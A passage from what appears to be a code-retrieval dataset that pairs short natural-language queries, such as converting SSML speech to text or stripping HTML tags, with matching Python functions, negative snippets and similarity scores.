x.safe_translation_getter(\"tr_title\", any_language=True)\n # Now save. This should not raise errors\n x.save()", "def fallbackSeries(requestContext, seriesList, fallback):\n if len(seriesList) > 0:\n return seriesList\n else:\n return fallback", "def conversation_fallback(update: Update, _: CCT) -> int:\n cast(User, update.effective_user).send_message('Invalid input. Aborting operation.')\n\n return ConversationHandler.END", "def adaptNeutralToCorba(self, *args):\n return _SALOMERuntime.RuntimeSALOME_adaptNeutralToCorba(self, *args)", "def setUp(self):\n super().setUp()\n translation.activate(\"en-us\")", "def unknown(update, context):\r\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Sorry, dat commando is onbekend.\")", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent_name = \"\"\n if 'intent' in intent_request:\n intent = intent_request['intent']\n if 'name' in intent:\n intent_name = intent['name']\n\n # Dispatch to your skill's intent handlers\n if not intent_name:\n return get_help_response()\n elif intent_name == \"Hello\":\n return say_hello()\n elif intent_name == \"Brandon\":\n return say_brandon()\n elif intent_name == \"Warning\":\n return say_warning()\n elif intent_name == \"Dance\":\n return say_dance_lights()\n elif intent_name == \"Spot\":\n return say_spot_light()\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_help_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n return say_hello()\n return get_help_response()", "def handle_700(self, ievent):\n\n try:\n self.encoding = ievent.arguments[1]\n rlog(10, self.name, '700 encoding now is %s' % self.encoding)\n except:\n pass", "def add_localizer(event):\r\n request = event.request\r\n localizer = get_localizer(request)\r\n def auto_translate(*args, **kwargs):\r\n return localizer.translate(tsf(*args, **kwargs))\r\n def auto_pluralize(*args, **kwargs):\r\n kwargs.setdefault(\"domain\", \"faapp\")\r\n return localizer.pluralize(*args, **kwargs)\r\n request.localizer = localizer\r\n request.translate = auto_translate\r\n request.ungettext = auto_pluralize\r\n request.environ['fa.translate'] = auto_translate", "def on_intent(request, session):\n\n intent_name = request['intent']['name']\n \n # process the intents\n if intent_name == \"AMAZON.HelpIntent\":\n return get_help_response()\n \n elif intent_name == \"AMAZON.StopIntent\":\n return get_stop_response()\n \n elif intent_name == \"AMAZON.CancelIntent\":\n return get_stop_response()\n \n elif intent_name == \"AMAZON.FallbackIntent\":\n return get_fallback_response()\n \n elif intent_name == \"recognizeDates\":\n slots = request['intent']['slots']\n date_start_slot = slots.get('dateStart',{'value':'NA'}).get('value','NA')\n date_end_slot = slots.get('dateEnd',{'value':'NA'}).get('value','NA')\n\n return get_intent_response(date_start_slot,date_end_slot)\n \n elif intent_name == \"PollHprofs\":\n slots = request['intent'].get('slots','')\n print(slots)\n speechOutput = \"Under development\"\n return response(speech_response(speechOutput, True))\n\n elif intent_name == \"SpinVMs\":\n slots = request['intent'].get('slots','')\n print(slots)\n speechOutput = \"Under development\"\n return response(speech_response(speechOutput, True))\n\n else:\n print(\"For invalid Intents reply with help\")\n return get_help_response()", "def get_lang_code(lang_code):\r\n if lang_code not in constants.SUPPORTED_LANG_CODES_ANALYZERS:\r\n return constants.FALLBACK_LANG_CODE\r\n return lang_code", "def get_locale():\n return \"he\"", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n elif intent_name == \"Ja_Bitte\":\n return Ja_Bitte_session(intent, session)\n else:\n raise ValueError(\"Invalid intent\")", "def handle_intent(intent_name):\n if intent_name in name_to_handler:\n return name_to_handler[intent_name]()\n else:\n return question_answer(intent_name)", "def test_fallback_variant(self):\n x = SimpleModel()\n\n x.set_current_language(\"de\")\n x.tr_title = \"Hallo-de\"\n\n x.set_current_language(\"en\")\n x.tr_title = \"Hello-en\"\n\n x.save()\n\n with translation.override(\"de-ch\"):\n x = SimpleModel.objects.get(pk=x.pk)\n self.assertEqual(x.tr_title, \"Hallo-de\")", "def on_intent(intent_request, session):\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n\n if intent_name not in skillmap:\n intent_name = \"NullSkill\"\n\n if intent_name in skillmap:\n try:\n return skillmap[intent_name].execute(intent, session)\n except Exception as e:\n traceback.print_exc()\n return SkillBase().respond(\"Sorry I missed that\", \"Error\", str(e))\n else:\n raise ValueError(\"Invalid intent\")", "def on_intent(event_request, session):\n print(\"=====on_intent requestId: \" + event_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = event_request['intent']\n intent_name = event_request['intent']['name']\n print(\"=====intent is: \" + intent_name)\n\n if intent_name == \"AnswerIntent\":\n print(\"=====AnswerIntent fired...\")\n if 'attributes' in session:\n if 'questions' in session['attributes']:\n return handle_answer_request(intent, session)\n\n # we probably got here because user said something other than\n # yes or no after asking if they wanted to play the game again\n print(\"=====no attributes ending game\")\n return play_end_message()\n if intent_name == \"GameIntent\":\n print(\"=====GameIntent fired...\")\n # if there's a session and we're in a game treat this as an answer\n # unfortunately it will be wrong but it's better than starting over\n if 'attributes' in session:\n if session['attributes']['game_status'] == \"in_progress\":\n return handle_answer_request(intent, session)\n return play_new_game(False)\n if intent_name in (\"AMAZON.StartOverIntent\", \"AMAZON.YesIntent\"):\n print(\"=====StartOverIntent or YesIntent fired...\")\n return play_new_game(True)\n if intent_name == \"AMAZON.NoIntent\":\n print(\"=====NoIntent fired...\")\n # if there's a session and we're in a game treat this as a wrong answer\n if 'attributes' in session:\n if session['attributes']['game_status'] == \"in_progress\":\n return handle_answer_request(intent, session)\n # otherwise end the game\n return play_end_message()\n if intent_name in (\"AMAZON.StopIntent\", \"AMAZON.CancelIntent\"):\n print(\"=====StopIntent or CancelIntent fired\")\n return play_end_message()\n if intent_name == 'AMAZON.HelpIntent':\n print(\"=====HelpIntent...\")\n tts = \"During the game I'll give you 6 random brain teasers and only 8 \"\\\n \"seconds to anser each one... To make your mind muscles stronger, I \"\\\n \"won't repeat any of the questions, so try to remember all the \"\\\n \"details... You can say 'Start Over' if you'd like a new game, \"\\\n \"or make your guess for the last question...\"\n return speech(tts, session['attributes'], False, None)", "def test_any_fallback_model(self):\n x = AnyLanguageModel()\n x.set_current_language(self.other_lang1)\n x.tr_title = \"TITLE_XX\"\n\n x.save()\n\n with translation.override(self.other_lang2):\n x = AnyLanguageModel.objects.get(pk=x.pk)\n self.assertRaises(\n TranslationDoesNotExist, lambda: x._get_translated_model(use_fallback=True)\n )\n self.assertEqual(\n x.tr_title, \"TITLE_XX\"\n ) # Even though there is no current language, there is a value.\n\n self.assertNumQueries(\n 0, lambda: x._get_any_translated_model()\n ) # Can fetch from cache next time.\n self.assertEqual(x._get_any_translated_model().language_code, self.other_lang1)", "def setPortalLocale( self ):\n info = getLanguageInfo( self )\n\n # find default and effective locale settings\n def_locale = info.get( sys.platform + '_locale' ) or info.get( os.name + '_locale' )\n cur_locale = getlocale()\n cur_locale = None not in cur_locale and '.'.join( cur_locale ) or ''\n\n # check whether locale is already ok\n if def_locale is None or cur_locale.lower() == def_locale.lower():\n return\n\n # change effective locale\n try:\n setlocale( LC_ALL, def_locale )\n except Exceptions.LocaleError:\n pass", "def convertNeutral(self, *args):\n return _SALOMERuntime.RuntimeSALOME_convertNeutral(self, *args)", "def test_fallback_status_emoji(self):\n self.assertEqual(get_emoji_for_status(None), \"\")", "def _insert_default_fallback(self):\n db.add_destination_with_aliases(self.dbm,\n \"https://duckduckgo.com?q={}\",\n \"DuckDuckGo\",\n [\"ddg\"],\n True,\n True)", "def test_single_locale_activation(self):\n with translation.override('fr'):\n self.assertEqual(\n Template(\"{% load i18n %}{% blocktrans %}Yes{% endblocktrans %}\").render(Context({})),\n 'Oui'\n )", "def fallback_status_codes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"fallback_status_codes\")", "def fallback_status_codes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"fallback_status_codes\")", "def handle_webdefaultallow(bot, ievent):\n cfg.set('whitelistenable', 0)\n ievent.reply('ok')", "def with_manual_check_fallback(self):\n self.__manual_check = constants.FALLBACK\n return self", "def add_support_for_localization():\n path = os.path.join(os.path.abspath(sys.argv[0]), os.pardir, os.pardir)\n possible_topdir = os.path.normpath(path)\n if os.path.exists(os.path.join(possible_topdir, 'nova', '__init__.py')):\n sys.path.insert(0, possible_topdir)\n\n gettext.install('nova', unicode=1)", "def Locale_IsAvailable(*args, **kwargs):\n return _gdi_.Locale_IsAvailable(*args, **kwargs)", "def test_locale_not_available(self):\n LocaleFactory.create(code='fakelocale')\n ProjectFactory.create(slug='valid-project')\n\n response = self.client.get('/fakelocale/valid-project/')\n assert_redirects(response, reverse('pontoon.home'))\n assert_equal(self.client.session['translate_error'], {'none': None})", "def handle_complete_intent_failure(message: Message):\n LOG.info(\"Failed to find intent.\")\n # context = {'client_name': 'mycroft_listener',\n # 'source': 'audio',\n # 'destination': [\"skills\"]}\n bus.emit(message.forward(\"complete.intent.failure\", message.data))", "def auto_lang(self, kwargs):\n\n destination = kwargs.get('destination')\n\n # If the destination is a discord.Channel or a discord.Member\n # (or any other destination instance that has the 'server' attribute)\n if hasattr(destination, 'guild'):\n return self.get_lang(destination.guild, destination)\n\n # If the destination is a user\n elif isinstance(destination, discord.channel.DMChannel) \\\n or isinstance(destination, discord.channel.GroupChannel):\n # The event could've been triggered from a guild, so use its language\n if hasattr(kwargs, 'event') and not kwargs['event'].is_pm:\n return self.get_lang(kwargs['event'].guild, kwargs['event'].channel)\n\n if isinstance(destination, discord.channel.GroupChannel):\n user = destination.owner\n else:\n user = destination.recipient\n\n if user.id in self.autolang_cache:\n return self.get_lang(self.autolang_cache[user.id])\n\n # Fetch common guilds between the user and the bot, and get the guilds languages.\n langs = [\n self.bot.sv_config.get(sv.id, 'lang', self.bot.config['default_lang'])\n for sv in self.bot.servers if sv.get_member(user.id) is not None\n ]\n\n # If there are no common guilds, just use the default language\n # (but it's kinda rare to talk to a bot that you don't have any guild in common, right?)\n if len(langs) == 0:\n return self.get_lang()\n\n # Get the mode language from the common user-bot guilds and use it.\n mode_lang = max(set(langs), key=langs.count)\n self.autolang_cache[user.id] = mode_lang\n self.log.debug('Language automatically set to %s for user \"%s\"', mode_lang, str(user))\n\n return self.get_lang(mode_lang)\n\n # Return the default language\n else:\n return self.get_lang()", "def default_locale(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"default_locale\")", "def default_locale(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"default_locale\")", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n print(\"---INTENT: \" + intent_name)\n\n # Dispatch to your skill's intent handlers\n try:\n if intent_name == \"GetSynonymIntent\":\n return get_synonym(intent, session)\n elif intent_name == \"GetRandomSynonymIntent\":\n return get_random_synonym(intent, session)\n elif intent_name == \"GetAllSynonymsIntent\":\n return get_all_synonyms(intent, session)\n elif intent_name == \"GetAntonymIntent\":\n return get_antonym(intent, session)\n elif intent_name == \"GetRandomAntonymIntent\":\n return get_random_antonym(intent, session)\n elif intent_name == \"GetAllAntonymsIntent\":\n return get_all_antonyms(intent, session)\n elif intent_name == \"GetPOSIntent\":\n return get_pos(intent, session)\n elif intent_name == \"GetRhymeIntent\":\n return get_rhyme(intent, session)\n elif intent_name == \"GetRandomRhymeIntent\":\n return get_random_rhyme(intent, session)\n elif intent_name == \"GetDefinitionIntent\":\n return get_definition(intent, session)\n elif intent_name == \"GetRandomDefinitionIntent\":\n return get_random_definition(intent, session)\n elif intent_name == \"GetAllDefinitionsIntent\":\n return get_all_definitions(intent, session)\n elif intent_name == \"GetSyllablesIntent\":\n return get_syllables(intent, session)\n elif intent_name == \"GetFrequencyIntent\":\n return get_frequency(intent, session)\n elif intent_name == \"GetPronunciationIntent\":\n return get_pronunciation(intent, session)\n elif intent_name == \"GetAllCommandsIntent\":\n return get_all_commands()\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n response = build_speechlet_response(\"Error\", \"Sorry, I don't know that command. I can find definitions, synonyms, antonyms, and more if you say something like 'a synonym for happy'.\", None, True)\n return build_response({}, response)\n\n except:\n response = build_speechlet_response(\"Error\", \"Sorry, I don't know that word!\", None, True)\n return build_response({}, response)", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"HelloWorldIntent\":\n return handle_session_end_request()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")", "def tr(self, message):\n # noinspection PyTypeChecker,PyArgumentList,PyCallByClass\n return QCoreApplication.translate('Hybriddekning', message)", "async def test_unsupported_domain(hass):\n request = get_new_request(\"Alexa.Discovery\", \"Discover\")\n\n hass.states.async_set(\"woz.boop\", \"on\", {\"friendly_name\": \"Boop Woz\"})\n\n msg = await smart_home.async_handle_message(hass, DEFAULT_CONFIG, request)\n\n assert \"event\" in msg\n msg = msg[\"event\"]\n\n assert not msg[\"payload\"][\"endpoints\"]", "def on_intent(intent_request, session):\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"GetLottozahlen\":\n return get_Lottozahlen(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_help_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")", "def _try_to_get_an_english_value(self, localized_values):\n if not localized_values:\n return None\n\n for localized_value in localized_values:\n if localized_value.language in self.ENGLISH_LANGUAGE_CODES:\n return localized_value.value\n\n return first_or_default(localized_values).value", "def play_human_custom(env):\n play_human(env)", "def InitLocale(self):\n self.ResetLocale()\n if 'wxMSW' in wx.PlatformInfo:\n import locale\n try:\n lang, enc = locale.getdefaultlocale()\n self._initial_locale = wx.Locale(lang, lang[:2], lang)\n # locale.setlocale(locale.LC_ALL, lang)\n # locale.setlocale(locale.LC_ALL, 'C')\n with open('./launch.log', 'a') as fp:\n fp.write(f'wxApp_LocaleFix.InitLocale: lang = {lang}\\n')\n print(lang)\n except (ValueError, locale.Error) as ex:\n target = wx.LogStderr()\n orig = wx.Log.SetActiveTarget(target)\n with open('./launch.log', 'a') as fp:\n fp.write(f'wxApp_LocaleFix.InitLocale:except-0 Unable to set default locale: \\'{ex}\\'\\n')\n print(\"Unable to set default locale: '{}'\".format(ex))\n wx.LogError(\"Unable to set default locale: '{}'\".format(ex))\n wx.Log.SetActiveTarget(orig)\n try:\n locale.setlocale(locale.LC_ALL, lang.replace('_', '-'))\n except (ValueError, locale.Error) as ex:\n locale.setlocale(locale.LC_ALL, lang.replace('-', '_'))\n target = wx.LogStderr()\n orig = wx.Log.SetActiveTarget(target)\n with open('./launch.log', 'a') as fp:\n fp.write(f'wxApp_LocaleFix.InitLocale:except-1 Unable to set default locale: \\'{ex}\\'\\n')\n print(\"Unable to set default locale: '{}'\".format(ex))\n wx.LogError(\"Unable to set default locale: '{}'\".format(ex))\n wx.Log.SetActiveTarget(orig)", "def get_adapt_intent(self, utterance, lang=\"en-us\"):\n msg = Message(\"intent.service.adapt.get\",\n {\"utterance\": utterance, \"lang\": lang},\n context={\"destination\": \"intent_service\",\n \"source\": \"intent_api\"})\n\n resp = self.bus.wait_for_response(msg,\n 'intent.service.adapt.reply',\n timeout=self.timeout)\n data = resp.data if resp is not None else {}\n if not data:\n LOG.error(\"Intent Service timed out!\")\n return None\n return data[\"intent\"]", "def is_forced(self, lang):\r\n return False", "def _initializeLocale():\n \n if sys.platform == constants.WIN32:\n locale.setlocale(locale.LC_ALL, \"\")\n else:\n if constants.LC_ALL in os.environ:\n try:\n locale.setlocale(locale.LC_ALL, os.environ[constants.LC_ALL])\n return\n except locale.Error:\n # First try did not work, encoding must be set first then set locale.\n pass\n languageCode, encoding = locale.getdefaultlocale()\n if languageCode is None:\n languageCode = \"en_US\"\n # Set the encoding of the Python environment if no encoding is set.\n if encoding is None:\n encoding = constants.UTF8\n if encoding.lower() == \"utf\":\n encoding = constants.UTF8\n try:\n locale.setlocale(locale.LC_ALL, \"%s.%s\" % (languageCode, encoding))\n except locale.Error:\n try:\n locale.setlocale(locale.LC_ALL, \"en_US.UTF-8\")\n except locale.Error:\n locale.setlocale(locale.LC_ALL, \"C\")" ]
[ "0.5877872", "0.5590493", "0.54645765", "0.54645765", "0.5408452", "0.5357488", "0.5357488", "0.53020567", "0.52696717", "0.5181241", "0.5174385", "0.5174385", "0.5167612", "0.51544356", "0.5071739", "0.5060613", "0.5031619", "0.49786136", "0.4932573", "0.4868343", "0.48520908", "0.48400244", "0.48286358", "0.48147333", "0.47970474", "0.47958162", "0.47594538", "0.4735542", "0.4662261", "0.46455666", "0.4628919", "0.45999712", "0.4555862", "0.45481646", "0.4547252", "0.45278513", "0.45027298", "0.45021227", "0.45002967", "0.44875798", "0.4465218", "0.4465218", "0.44615605", "0.44596776", "0.44488686", "0.44473162", "0.4447059", "0.44438565", "0.44437882", "0.44410273", "0.44259438", "0.44233277", "0.4395368", "0.43847686", "0.4365664", "0.43587998", "0.4358335", "0.4355626", "0.43522638", "0.43430126", "0.43429708", "0.43269393", "0.43264398", "0.4324395", "0.4319224", "0.4317371", "0.43141565", "0.4314141", "0.43076912", "0.42993146", "0.42965984", "0.42923018", "0.4288771", "0.4281695", "0.42747396", "0.42629808", "0.4260062", "0.42588806", "0.4257598", "0.4257598", "0.42476434", "0.42340103", "0.42328084", "0.42313045", "0.4231242", "0.42287582", "0.42266932", "0.42238793", "0.42238793", "0.4222837", "0.42227015", "0.42214206", "0.4221301", "0.42187518", "0.4217171", "0.4214136", "0.41984046", "0.41934243", "0.41870832", "0.41855055" ]
0.5607832
1
convert ssml speech to text, by removing html tags.
def convert_speech_to_text(ssml_speech): # type: (str) -> str s = SSMLStripper() s.feed(ssml_speech) return s.get_data()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def ssml_to_text(ssml):\n return re.sub(r\"<[^>]+>\", \"\", ssml)", "def convert_text_to_ssml(chunk):\r\n # Escape chars that are forbidden in SSML\r\n chunk = chunk.replace('\"', \"&quot;\").replace('&', \"&amp;\").replace(\"'\", \"&apos;\").replace(\"<\", \"&lt;\").replace(\">\", \"&gt;\")\r\n # <p></p> makes a longer pause happen between paragraphs\r\n chunk = chunk.replace(\"\\r\\n\\r\\n\", \"</p>\\n<p>\").replace(\"\\n\\n\", \"</p>\\n<p>\")\r\n chunk = \"<speak><amazon:auto-breaths><p>\" + chunk + \"</p></amazon:auto-breaths></speak>\"\r\n # Ensure no duplicate tags\r\n chunk = chunk.replace(\"</p></p>\", \"</p>\").replace(\"</p>\\n</p>\", \"</p>\").replace(\"<p><p>\", \"<p>\").replace(\"<p>\\n<p>\", \"<p>\")\r\n return chunk", "def _convert_speech_to_text(self, storage_uri):\n\n responses = self._convert_speech_to_text_by_api(storage_uri)\n texts = [result.alternatives[0].transcript for result in responses.results]\n self._texts = '\\n\\n'.join(texts)", "def get_html2text(html):\n text_maker = html2text.HTML2Text()\n text_maker.body_width = 0\n return text_maker.handle(html)", "def strip_tags(html):\n if html is None:\n html = ''\n s = MLStripper()\n s.feed(html)\n return s.get_data()", "def remove_html( html):\n return html2txt(html)", "def strip_tags(self, html):\n s = MLStripper()\n s.feed(html)\n return s.get_data()", "def convert_html():\n return", "def html_to_text(html):\n s = TextExtractorHTMLParser()\n s.feed(html)\n return s.get_text()", "def remove_html_tags(text):\n print('VOU REMOVER AS TAGS DA STRING')\n clean = re.compile('<.*?>')\n print('',re.sub(clean, '', text))\n return re.sub(clean, '', text)", "def remove_html_tags(self,text):\n #https://medium.com/@jorlugaqui/how-to-strip-html-tags-from-a-string-in-python-7cb81a2bbf44\n clean = re.compile('<.*?>')\n return re.sub(clean, '', text)", "def strip_tags(text):\n # Remove header tags\n p = re.compile(\"<\\?.+?\\?>\") \n text = re.sub(p, \"\", text)\n\n # Remove <HOO>, <p> and <s> tags\n text = text.replace(\"<p>\",\"\")\n text = text.replace(\"</p>\",\"\")\n text = text.replace(\"<s>\",\"\")\n text = text.replace(\"</s>\",\"\")\n text = text.replace(\"<HOO>\",\"\")\n text = text.replace(\"</HOO>\",\"\")\n\n return text", "def remove_html_tags_fun(self):\n cleaner = re.compile('<.*?>')\n cleaned_text = re.sub(cleaner, '', self.doc)\n cleaned_text = re.sub('[\\n\\t]', '', cleaned_text)\n self.doc = cleaned_text", "def _html_text(self, html):\n ee = None\n try: return html.html_text()\n except Exception, e: ee = e; pass\n try: return html.xml_text()\n except Exception, e: print \"HtmlDocument/text\", ee, e; pass\n try: return str(html)\n except Exception, e: print \"HtmlDocument/text\", e; return \"&nbsp;\"", "def remove_html_tags(html_text: str) -> str:\n document = fromstring(html_text)\n text = document.text_content()\n return text.strip()", "def stripHTMLTags (html):\n text = html\n \n # apply rules in given order!\n rules = [\n { r'>\\s+' : u'>'}, # remove spaces after a tag opens or closes\n { r'\\s+' : u' '}, # replace consecutive spaces\n { r'\\s*<br\\s*/?>\\s*' : u'\\n'}, # newline after a <br>\n { r'</(div)\\s*>\\s*' : u'\\n'}, # newline after </p> and </div> and <h1/>...\n { r'</(p|h\\d)\\s*>\\s*' : u'\\n\\n'}, # newline after </p> and </div> and <h1/>...\n { r'<head>.*<\\s*(/head|body)[^>]*>' : u'' }, # remove <head> to </head>\n { r'<a\\s+href=\"([^\"]+)\"[^>]*>.*</a>' : r'\\1' }, # show links instead of texts\n { r'[ \\t]*<[^<]*?/?>' : u'' }, # remove remaining tags\n { r'^\\s+' : u'' } # remove spaces at the beginning\n ]\n \n for rule in rules:\n for (k,v) in rule.items():\n regex = re.compile (k)\n text = regex.sub (v, text)\n \n # replace special strings\n special = {\n '&nbsp;' : ' ', '&amp;' : '&', '&quot;' : '\"',\n '&lt;' : '<', '&gt;' : '>'\n }\n \n for (k,v) in special.items():\n text = text.replace (k, v)\n\n filtered = filter(lambda x: not re.match(r'^\\s*$', x), text) \n finaltext = re.sub(u'分享:','', filtered)\n return finaltext", "def textilize(s):\n s = s.replace(\"<p>\", \" \").replace('&nbsp;', ' ')\n return _re_html.sub(\"\", s)", "def RemoveHTMLTags(self, data):\n return self.UnescapeHTMLEntities(lxml.html.fromstring(data).text_content())", "def remove_Tags(self,text):\n cleaned_text = re.sub('<[^<]+?>', '', text)", "def remove_html_tags(text: str) -> str:\n return re.sub('<.*?>', '', text).strip()", "def convert_html_to_text(html_str: str, ignore_tags: None = None) -> str:\n if not html_str:\n return \"\"\n if html_parser is None:\n return strip_tags(html_str)\n\n parser = HTMLParser(encoding=\"utf-8\")\n root = html_parser.fromstring(html_str.encode(\"utf-8\"), parser=parser)\n try:\n body = root.xpath(\"./body\")[0]\n except IndexError:\n # No body element\n body = root\n\n for tag in HTML_GARBAGE:\n els = body.xpath(\".//\" + tag)\n for el in els:\n el.getparent().remove(el)\n\n convert_element(body, ignore_tags=ignore_tags)\n\n text = html_parser.tostring(\n body, pretty_print=True, method=\"text\", encoding=\"utf-8\"\n ).decode(\"utf-8\")\n\n return \"\\n\".join(x.strip() for x in text.splitlines()).strip()", "def html_to_text(html_message):\r\n process = Popen(\r\n ['lynx', '-stdin', '-display_charset=UTF-8', '-assume_charset=UTF-8', '-dump'],\r\n stdin=PIPE,\r\n stdout=PIPE\r\n )\r\n # use lynx to get plaintext\r\n (plaintext, err_from_stderr) = process.communicate(\r\n input=html_message.encode('utf-8')\r\n )\r\n\r\n if err_from_stderr:\r\n log.info(err_from_stderr)\r\n\r\n return plaintext", "def synthesize_ssml_file(ssml_file):\n from google.cloud import texttospeech\n client = texttospeech.TextToSpeechClient()\n\n with open(ssml_file, 'r') as f:\n ssml = f.read()\n input_text = texttospeech.types.SynthesisInput(ssml=ssml)\n\n # Note: the voice can also be specified by name.\n # Names of voices can be retrieved with client.list_voices().\n voice = texttospeech.types.VoiceSelectionParams(\n language_code='en-AU',\n name='en-AU-Wavenet-D',\n ssml_gender=texttospeech.enums.SsmlVoiceGender.NEUTRAL)\n\n audio_config = texttospeech.types.AudioConfig(\n audio_encoding=texttospeech.enums.AudioEncoding.MP3,\n speaking_rate=0.80)\n\n response = client.synthesize_speech(input_text, voice, audio_config)\n\n # The response's audio_content is binary.\n filename = ssml_file\n try:\n filename = filename.replace('.txt', '.mp3')\n filename = filename.replace('../Articles/', '')\n filename = filename.replace(';', ' ')\n filename = filename.replace(\"'\", \" \")\n except Exception as e:\n print(e)\n print('Check replace command in synthesize_file.py file')\n\n with open(filename, 'wb') as out:\n out.write(response.audio_content)\n print(f'Audio content written to file: \\n{filename}\\n')", "def enml_to_html(enml):\n return normalize_enml(enml)", "def _remove_html_tags(self, text: str) -> str:\n pattern = r\"\"\"\n (?x) # Turn on free-spacing\n <[^>]+> # Remove <html> tags\n | &([a-z0-9]+|\\#[0-9]{1,6}|\\#x[0-9a-f]{1,6}); # Remove &nbsp;\n \"\"\"\n return re.sub(pattern, \" \", str(text))", "def remove_html(txt):\r\n TAG_RE = re.compile(r'<[^>]+>')\r\n return TAG_RE.sub(\"\", txt).strip()", "def _remove_tags(self, text):\n try:\n result = \"\".join(xml.etree.ElementTree.fromstring(text).itertext()).replace(\n \"\\n\\n\", \"\\n\"\n )\n except: # pylint: disable=bare-except\n result = text\n return result", "def remove_html_tags(text):\n if type(text) is pd.core.series.Series or type(text) is str:\n text = text.replace(\"'\", \" \").replace('\"', \" \")\n clean = re.compile('<.*?>')\n return re.sub(clean, ' ', text)\n return text", "def remove_html_tags(self, text, tags):\n\t\tcheck_if_any_type(text, [str, str])\n\n\t\tfor tag in tags:\n\t\t\tcheck_if_any_type(tag, [str, str])\n\t\t\ttext = re.compile('<\\/?%s\\/?>' % tag, re.U).sub('', text)\n\t\treturn text", "def cleaning(full_text):\n try:\n if open(RESULT_PATH):\n os.remove(RESULT_PATH)\n \n else:\n print(\"No output.mp3\")\n except Exception as e:\n print(str(e))\n\n text = full_text\n\n book = ''.join(text)\n\n\n book = book.replace('.', '.<eos>')\n book = book.replace('?', '?<eos>')\n book = book.replace('!', '!<eos>')\n\n sentences = book.split('<eos>')\n\n return sentences", "def remove_html_tags(text: str) -> str:\n clean = re.compile('<.*?>')\n return re.sub(clean, '', str(text))", "def clean_sotu(speech_link: str, headers: dict) -> str:\n response = requests.get(speech_link, headers=headers)\n sotu_soup = BeautifulSoup(response.content, 'html')\n text = sotu_soup.find('div', {'id': 'text'}).text.replace('< Previous\\xa0\\xa0\\xa0Next >', '').rstrip('^ Return to top\\n').strip()\n speech = text.lstrip('State of the Union Address').strip()\n return speech", "def html_text(self):\n return g.markdown_wiki.convert(self.data.text)", "def remove_html_tags_from_text(html_data, add_detectors=True, attached_tags=list, site_tags=list,\n exclude_site_tags=False, exclude_assignment=False):\n try:\n html_data = html.unescape(html_data)\n if add_detectors:\n html_data = __set_has_codeblock(html_data)\n html_data = __set_has_link(html_data)\n if html_data is None:\n return None\n stripper = HTMLStripper()\n stripper.feed(html_data)\n stripped_html = stripper.get_data()\n # remove newlines from string (since all posts starts/ends with <p>)\n stripped_html = ' '.join(stripped_html.split())\n if add_detectors:\n stripped_html = __set_has_hexadecimal(stripped_html)\n stripped_html = __set_has_numeric(stripped_html)\n # due to external tags also overwriting others, this has been omitted\n stripped_html = __set_has_tag(stripped_html, attached_tags, site_tags, exclude_site_tags)\n homework_list = constants.HOMEWORK_SYNONMS_LIST\n homework_list.sort(key=len, reverse=True)\n replacement_text = constants.QUESTION_HAS_HOMEWORK_KEY\n stripped_html = __set_has_homework_or_assignment(stripped_html, replacement_text, homework_list)\n if not exclude_assignment:\n assignment_list = constants.ASSIGNMENT_LIST\n replacement_text = constants.QUESTION_HAS_ASSIGNMENT_KEY\n stripped_html = __set_has_homework_or_assignment(stripped_html, replacement_text, assignment_list)\n return stripped_html\n except TypeError as error:\n # print html_data\n print(\"Error occurred in text_processor.remove_html_tags_from_text\", error)\n return None", "def clean_text_from_html_tags(message):\n regex_style_tag = re.compile('<style.*?>[\\\\s\\\\S]*?</style>')\n message = re.sub(regex_style_tag, \" \", message)\n regex_script_tag = re.compile('<script.*?>[\\\\s\\\\S]*?</script>')\n message = re.sub(regex_script_tag, \" \", message)\n regex_html_tags = re.compile('<.*?>|&([a-z0-9]+|#[0-9]{1,6}|#x[0-9a-f]{1,6});')\n message = re.sub(regex_html_tags, \" \", message)\n return message", "def parsingconvtext(retrievedtext,customtextlist):\r\n if not retrievedtext: #in case empty text \r\n retrievedtext=changenonetostr(retrievedtext)\r\n newtext=BeautifulSoup(retrievedtext).get_text() \r\n #newtext=changenonetostr(retrievedtext)\r\n #newtext=BeautifulSoup(newtext).get_text() \r\n #remove http links\r\n newtext=re.sub(r'http\\S+', '', newtext)\r\n 